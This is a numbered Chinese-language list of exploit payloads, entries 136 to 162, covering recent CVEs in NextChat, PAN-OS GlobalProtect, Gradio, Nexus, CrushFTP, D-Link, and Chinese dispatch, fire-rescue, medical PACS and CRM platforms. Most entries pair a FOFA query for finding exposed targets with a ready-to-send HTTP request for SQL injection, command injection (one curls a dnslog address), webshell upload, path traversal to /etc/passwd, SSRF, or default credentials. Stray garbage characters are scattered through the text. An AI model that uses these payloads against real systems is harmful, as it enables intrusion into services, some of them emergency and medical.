% D* _  k  l0 I* @( A7 v8 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' o3 V+ G1 `- A" Q# _- \7 _' hAccept-Encoding: gzip, deflate
1 v; g  q. }! p7 f# g, \Accept-Language: zh-CN,zh;q=0.9
* b1 f7 ^  V2 J) l" E$ xConnection: close
5 V. s0 v3 l& y( O) w/ Y  e6 ?# R. L

6 T; `$ X9 [" u# p/ F$ I136. NextChat cors SSRF
" D" n& C3 o5 gCVE-2023-49785
2 N% T+ `4 d+ l4 ]" eFOFA:title="NextChat"
- V3 a! O) k6 y: N& a6 B' O" ?) v) {GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
) l8 Z, ?: Z8 V8 w$ \; W! jHost: x.x.x.x:10000
3 s$ Y0 ?9 \6 N% qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 ?) G7 T/ S3 `! S6 ?7 c" yConnection: close
, A3 a$ V; a( V' d( @5 o0 eAccept: */*
& b% P1 o3 p. `& }Accept-Language: en$ M  O: ^1 B. y% f4 g" f
Accept-Encoding: gzip
1 g& r' v0 D* W0 m0 f: N# C1 e  {3 J5 g  s; y5 x
. Z/ U* p) q: K. F
137. 福建科立迅通信指挥调度平台down_file.php sql注入' v# w* ~7 ?/ V' q* ^2 }
CVE-2024-26203 [  {; M& D# S% y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 D7 v7 l8 _1 Q" L/ S9 C7 yGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 E* v3 K+ k% O, B) x: o, a
Host: x.x.x.x6 ^/ f" C- _8 K' K: N/ O% f: U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 _0 d- h& L( L0 ~; CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) d! s1 }! V1 |% @# {# G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# p1 r6 Y( A4 Z  L0 {! rAccept-Encoding: gzip, deflate, br! ]1 E, k  s- y- X4 X3 p
Connection: close
9 W* ]7 ~( L8 d/ \  ]5 vCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
9 ^4 N  L( k# {2 }Upgrade-Insecure-Requests: 1. ?( E) d: W8 s) A
7 ?7 H% B3 l: ]+ s$ m+ q& P

  _5 O* x4 w! j  F6 H* \8 L- a138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, O8 {7 v$ N: ]9 p5 A) H
CVE-2024-2621. p' d! H& M  H0 d1 t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 Y5 `0 f% C/ t
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1! a2 K- O' \5 j2 f6 d# g* C9 U
Host: x.x.x.x
  k& j- z. [4 c$ C9 R3 o% N  aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 n% F' I# o9 y% Z. y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  k/ V; Q3 h+ q5 c- L! i* D. z: rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) l2 b/ d$ o7 T0 M* h% |, `0 mAccept-Encoding: gzip, deflate, br8 n4 L# z3 G1 R6 h
Connection: close" W7 ^( L4 L: k! f
Upgrade-Insecure-Requests: 1/ _' \, ~* {; \
' m' D1 r( z& {, b0 K) u

) y( b4 a9 u+ j6 S8 Z  K139. 福建科立讯通信指挥调度平台editemedia.php sql注入
3 Z% J- b: |) _& k  FCVE-2024-2622! r3 D4 A/ ?% u* r1 X; I! |" y- @
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" \( n9 w+ e$ ~( w. p; q1 c9 D6 K
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1* u% }6 ~) d! q- b7 V+ |9 E
Host: x.x.x.x/ K! a8 R5 A7 I" J( c) K0 m3 C4 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 c( G* R4 L* g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  @- C6 C, \# i( B# k7 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* c3 G  |; @8 D! ^) o0 [Accept-Encoding: gzip, deflate, br* H3 K- |# R0 I
Connection: close
; r4 I. t( }0 C* v0 R( ECookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk& a+ ^0 z  K) T( N  {2 l/ u& _
Upgrade-Insecure-Requests: 1
! [7 i5 s: ]( X3 G0 C
& c' y% N0 I5 {2 R% ?5 T2 s" @" H- O. u: i4 E# v3 u
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入0 L! ~. J, b1 Y" n- V, e  u6 x3 N
CVE-2024-2566; G# O* t0 z4 T% ^9 _
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) I9 K7 T5 Y1 [" l; }% yGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.19 j0 s2 ?+ h# Z: i. U3 Z, _+ J
Host: x.x.x.x
8 L! q: e3 }2 a! b% G6 v& C  y7 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* V, n" v2 F5 \& H# C2 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" f9 X+ `* x. t+ ]( C- Z) x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 z, a' u' w: `$ g' T9 I* g, I
Accept-Encoding: gzip, deflate, br
4 }$ a# f8 C5 x. OConnection: close/ |' a% M2 g" N8 Y0 [: F7 G
Cookie: authcode=h8g9
0 e) P9 ?5 r+ i- @4 \) b. bUpgrade-Insecure-Requests: 1
  Q7 C! _8 j6 d% B& A
1 d* ]& G8 u4 C" [) n2 d8 Z5 p+ m. G
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入; n6 O9 d: W: I+ s2 R2 l; |
FOFA:body="指挥调度管理平台"" p$ z1 X" W( u1 B2 w: h
POST /app/ext/ajax_users.php HTTP/1.1
+ R7 [5 y$ U! R3 AHost: your-ip; \3 b# S  a! ?  }$ T
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info: C  w9 t$ t3 j8 H' Y# i
Content-Type: application/x-www-form-urlencoded9 ]: k: @8 _) z

  w) n3 q+ l0 t% \$ M" e2 t: u
. q% X. `1 e! s) n. [) m  rdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -3 V8 L1 f4 T! @$ g" t: T, h2 }. \' j
. `: ?# ?2 W2 j4 F" u2 |5 ~

1 e, c8 ], z- E3 Z* o2 G142. CMSV6车辆监控平台系统中存在弱密码+ J" D' [; S% V' _: r" T5 M9 k
CVE-2024-29666
3 W9 Z- d  ?, g' EFOFA:body="/808gps/"! @. B3 r/ m! S8 r4 k& l
admin/admin
* `: ]) q- z8 s143. Netis WF2780 v2.1.40144 远程命令执行
. ]( \7 j$ e  `% z/ Y, sCVE-2024-25850# C% w1 b7 x& N& E
FOFA:title='AP setup' && header='netis'
0 h7 c1 N9 L  w+ Y# w/ KPAYLOAD/ u! W; ?) {6 c
7 p0 b% }9 K1 B5 x1 S
144. D-Link nas_sharing.cgi 命令注入
: Z$ S$ ?2 r3 |5 i8 OFOFA:app="D_Link-DNS-ShareCenter"
* l+ Q( d+ X" M" Q) `. t5 {system参数用于传要执行的命令
; ^. |8 s+ @+ s, B5 k, k3 C' jGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
& T% x/ D5 g+ T$ ]  y& sHost: x.x.x.x
/ o7 J" }- W* V/ Q- o8 D0 mUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
' N& `  J" Z4 m* v- E7 M' ?# RConnection: close
% H# r  _+ S6 J# fAccept: */*$ e5 Z# y) v- c9 y! {; @& M! o
Accept-Language: en
& g/ e; p2 w  n% x' LAccept-Encoding: gzip- @# W1 q1 S- T) _8 m

: a+ G6 [, }- \1 k
" \4 Z  a  U) L+ J1 s145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ A$ i. v7 l. S' ^
CVE-2024-3400
) m4 E' t) c3 ^0 k* ^1 A  G% vFOFA:icon_hash="-631559155"  M. j# @. z' \. z
GET /global-protect/login.esp HTTP/1.1
- Z! d  p! ]* O, m% h, W" ^  eHost: 192.168.30.112:1005
6 C! M' q1 a$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( }  X5 G/ J  z, i
Connection: close4 e$ {. r* F* d5 A
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;$ G! Q' \9 Y" f5 C3 z' W
Accept-Encoding: gzip8 D8 e" W& X$ h0 c5 M

* P# k! `2 {2 d- p
/ S( r. X  h% {6 P* m% g: }+ `146. MajorDoMo thumb.php 未授权远程代码执行
% r* _* d% ~- S$ jCNVD-2024-02175
3 b4 n) M0 p3 [; n) E) lFOFA:app="MajordomoSL"
; _7 p0 G3 L2 e' b1 ]GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" \5 z& q5 H* x* _: ^Host: x.x.x.x
) M9 }8 S7 [$ N( RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' c' `4 L$ n5 z5 e) Y
Accept-Charset: utf-80 B. v# n# r7 t
Accept-Encoding: gzip, deflate0 {; J: K( G( f( U
Connection: close" u& Q) b1 X1 p) k  V& A7 o

3 l: N" f. Y+ C6 ~' t0 v+ r; t9 E. Z: J5 J- Y! l/ Y% h
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历; y% o; |( j( N! R; Y
CVE-2024-32399
% {  l( |" N1 _; U6 gFOFA:body="RaidenMAILD"$ I9 N' {! f6 a  B. C
GET /webeditor/../../../windows/win.ini HTTP/1.19 n4 ^. X4 U" B9 U4 l7 Y( r' ^( C
Host: 127.0.0.1:81
  h, [  N# t: K1 p2 A* rCache-Control: max-age=0# T3 d4 W' X& D7 o3 v) J
Connection: close
/ m0 o* l6 O5 a# r9 A9 q  b
+ V) y3 M& Q5 ~: Y2 Q0 _" S9 R, i" k( ~$ m8 S
148. CrushFTP 认证绕过模板注入) R3 ?4 ~% y7 V9 t
CVE-2024-4040
" B7 y) e0 {( R& N! A3 uFOFA:body="CrushFTP"( W$ Y/ N$ t, u! V  H2 j
PAYLOAD
! {: O" C) P: {/ @  Q
2 b* s6 z: T- G9 ]149. AJ-Report开源数据大屏存在远程命令执行
% e  K6 B6 Z3 B% FFOFA:title="AJ-Report"8 @! h- a" c  ^& d6 t$ ^& F

" v: U9 F* I/ @5 t* yPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 a* @( k8 x# \* J; @* s/ s$ ?- `Host: x.x.x.x6 b' t4 e. e. }; {: f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 U1 U$ O8 ~, [. T' HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  i5 m/ O% X) S: v0 r2 fAccept-Encoding: gzip, deflate, br
$ ?+ m% W8 i* B  s- N1 [8 HAccept-Language: zh-CN,zh;q=0.9( C1 U8 @; z' Z% g! u
Content-Type: application/json;charset=UTF-8
- K" ?% g6 \4 m6 oConnection: close
, z. T# X1 w( N
( D$ P, M% r, s7 ^5 L3 _& L{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: [1 m' \6 ]4 b7 x# i) [6 p
3 b1 L- S  _& ~4 h' i& N' N150. AJ-Report 1.4.0 认证绕过与远程代码执行8 Y# ?$ A8 m6 j8 z3 {
FOFA:title="AJ-Report"* M7 c0 Z9 A+ v/ w& r5 @
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- \3 K4 t8 `  LHost: x.x.x.x
2 c% U& i3 C& L! {" C% J+ d0 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 m9 U1 S! `3 z' O5 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 `/ o' c5 z5 W3 I% ^Accept-Encoding: gzip, deflate, br; ^+ I1 \: b) U: b" S; o( O
Accept-Language: zh-CN,zh;q=0.93 D& {5 h* V2 H
Content-Type: application/json;charset=UTF-8
7 K5 x6 ]5 _' _8 JConnection: close2 D; L7 B' g& u. ]
Content-Length: 339
% m% `* V& I( h2 i* L6 m4 z3 |0 t6 }# G. W, B5 B
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}+ ]2 K' J9 I1 d, T

" I6 p( Y) X- B7 t. G% b3 Z+ e$ _, l0 g6 k! U0 m" E; `
151. AJ-Report 1.4.1 pageList sql注入1 {- \6 j; J2 e
FOFA:title="AJ-Report"0 G+ W, O; j' s3 b$ c- h# j
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
7 L$ z$ y3 u7 `- o: S; R# s0 bHost: x.x.x.x7 T# \5 z  [1 J; O: ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 A/ K1 j& T# B1 TConnection: close( {% ^. e3 I# o2 C$ Y2 z
Accept-Encoding: gzip
* W! W- Y2 ?/ z: c, ^6 o8 `% G2 R3 Z
# R3 W% U4 l! C" ?- l' U5 y' d7 z) b7 ]1 ^& C: C6 K6 P/ M
152. Progress Kemp LoadMaster 远程命令执行
, C: `& k( u3 g0 S+ [CVE-2024-12122 D6 N) s3 r1 M+ g9 t) n  {
LoadMaster <= 7.2.59.2 (GA)5 [1 t1 X% a( w" T7 w
LoadMaster<=7.2.54.8 (LTSF)& K6 K3 ]6 a# A) m0 l, r
LoadMaster <= 7.2.48.10 (LTS)5 V, ~2 Z! l0 Z3 J
FOFA:body="LoadMaster"
! e2 R8 N/ R7 T5 G4 F$ i1 V9 MJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
, Z; l6 c: t$ M3 }5 sGET /access/set?param=enableapi&value=1 HTTP/1.1
+ M8 @( I' J4 @" o+ F3 V, oHost: x.x.x.x
0 B, D4 N, j2 i$ o( y6 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1# ^% H2 T4 C# J. X* q5 K
Connection: close
6 {* |5 m" G8 G% d5 h7 }4 HAccept: */*
7 _9 f; K0 A$ I0 DAccept-Language: en
+ d2 }7 ~! m, B# |4 I; rAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
0 H6 G+ L2 n+ U+ J2 d, A/ Y& _Accept-Encoding: gzip$ H& p5 C; [/ m4 s2 v1 z
# A4 t3 N' ~, o# M3 b  D! U: Q
6 S) x4 [* l) |7 S7 V
153. gradio任意文件读取" |: @1 S  b4 P) ~( A- q4 O
CVE-2024-1561FOFA:body="__gradio_mode__"
. |" ]+ c# {. |$ C! K% I$ H. N第一步,请求/config文件获取componets的id0 c+ \8 P% b: v; o  c: y5 o' Y
http://x.x.x.x/config% w# v4 M6 p+ A9 H) d6 D- Q" w

( D2 c/ [9 _. v- w: I/ K9 m
$ z4 ?- [3 m6 l' K4 M0 t$ M/ H( @# P0 b第二步,将/etc/passwd的内容写入到一个临时文件
7 d4 |) A4 O2 Z4 F  I. N& _& sPOST /component_server HTTP/1.1
) Q' L0 [/ _( z0 m* w3 ]4 t4 WHost: x.x.x.x1 D. M5 x  K, ^2 c) T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
, e9 P1 G+ e- O3 F, U. z; `! }Connection: close
4 h: s. E  X" V' |+ \) H2 l; MContent-Length: 1154 Q& I3 |5 L- z8 {9 ?+ y' p+ n
Content-Type: application/json
* J! E$ U! t( G. U2 GAccept-Encoding: gzip( X* E, l4 Z' ~" X. e6 `9 f

+ z6 B& E6 z4 p# Z- i/ H{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
6 S8 M1 Y3 U7 h
2 X& \+ e& H! I5 q8 R3 ]" R5 e2 o: p9 @3 R  B
第三步访问& G) g9 v  G0 c5 n' s- \/ [
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
1 B' H& X2 Q8 d. {9 [! i! r7 c/ h8 x9 n! R) V# s

4 c. r6 c: A2 m, w  z154. 天维尔消防救援作战调度平台 SQL注入. U# p7 U/ n  W! i4 G! |' h2 E
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"% Y5 S! ~% y  k- Z. ~) ?
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
- k. q9 @2 V: IHost: x.x.x.x
: k' G1 d5 O* ~" h6 JContent-Length: 106/ A5 ^$ J4 T7 b3 p; |' P
Cache-Control: max-age=0
0 N8 z! U! z! ]. h" ~# HUpgrade-Insecure-Requests: 1
% L+ p4 |/ C7 ~3 b1 G2 YOrigin: http://x.x.x.x& C2 b$ S8 T# F, W4 L
Content-Type: application/json
6 P  R5 u! c* r" p- s, t# AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 `9 _3 p9 U" ]; v0 D9 `& p3 @: S* ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 w2 [7 z, b& _Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page/ h' s! e% |' n  Q
Accept-Encoding: gzip, deflate0 j: |" |" f/ ~* B$ _- q& f
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
1 h& l  ~' ^8 ^- o* kConnection: close- r- e) P/ `" Q4 r# z2 c$ X. g
  @  B9 e9 [1 C
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}5 E/ \4 S+ G8 n. T! f

) c" r% `( Q: f+ b) ~, e! l. r" u3 C: @  a
155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"

POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php


156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216

curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


9 ^2 ~, L% ~  u3 y- x$ o: t$ f  t157. 美特CRM upload.jsp 任意文件上传$ ]" [7 z  E4 p1 y
CNVD-2023-06971
4 I5 r! x8 U: Y& z5 Z1 E- dFOFA:body="/common/scripts/basic.js"
1 E0 b- ^& ]; R+ h" w/ G! ]2 d/ \POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1& o) t! s5 m% S# z4 ?( e3 d
Host: x.x.x.x
$ @( b+ T( `9 ?+ C4 R3 f- e9 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 d, t; y- L6 v/ [$ D
Content-Length: 709/ p. l$ U% |! w! P: T; ?% P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& c8 p- P' y7 F: k/ e+ K
Accept-Encoding: gzip, deflate/ O; i, m" q/ g0 ~5 r; Z3 v$ N1 b
Accept-Language: zh-CN,zh;q=0.92 L8 C/ a  @% q! N* x
Cache-Control: max-age=0
% D# i, `) ]. E. `, E. b- }* KConnection: close
; B- \0 t! h9 N& v2 \8 @" R8 u( n/ XContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
/ r; M, c2 W( ~* X* rUpgrade-Insecure-Requests: 10 X; L# ~5 s4 N( i' }
! W, x4 _4 W& \8 T" d* G# Z6 k
------WebKitFormBoundary1imovELzPsfzp5dN
4 R% ]  {0 }% d& W) G' j& ^0 H) GContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
; I* D! G! f% ?Content-Type: application/octet-stream
7 G/ l9 g$ D- T$ ~( X7 Z* U! E& ^' O% d
nyhelxrutzwhrsvsrafb
: r! O7 ]8 H, n& q1 E9 J------WebKitFormBoundary1imovELzPsfzp5dN
4 h8 x; S6 f' H7 hContent-Disposition: form-data; name="key"  z6 |; B# S" M+ b
. U' _) c4 c2 m  `
null! B/ L2 u# w& [0 w+ C  R- E' k+ H
------WebKitFormBoundary1imovELzPsfzp5dN
; w+ |$ b* k8 I0 c; g* M% f% nContent-Disposition: form-data; name="form"2 M: E  [$ r8 r) ]" M

/ F; ^! x  y; s2 Q0 O. j6 X) g8 v7 enull4 }# b; s& y; x, H% f
------WebKitFormBoundary1imovELzPsfzp5dN
; |* C' x, W, w& XContent-Disposition: form-data; name="field"
9 T- Y0 X5 o% m1 v0 F( o! K: i9 h$ m
null  n- x; r# b" b6 q$ Q, @. n! K
------WebKitFormBoundary1imovELzPsfzp5dN3 O. ?; u+ a3 e% X/ o9 r' c
Content-Disposition: form-data; name="filetitile"
' S. {* ^7 B4 k( C8 D% o! N. y6 j9 R4 k
null# V: h) m- N( w, G! e0 H% k
------WebKitFormBoundary1imovELzPsfzp5dN2 R& O8 s3 I) e# }* r5 G! o
Content-Disposition: form-data; name="filefolder"+ s& {' H# b2 i' f& f/ A* L, D4 T
) t" m; b6 T" T8 M0 z
null7 r2 z$ W' C, A1 h* Z
------WebKitFormBoundary1imovELzPsfzp5dN--
8 B/ i8 f5 `: _/ Z6 y" H1 W! b) V# m, _' _
% k% z4 g: ~" O5 ]
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
" h  ~1 J4 ^1 N) K; \9 Z- D
158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
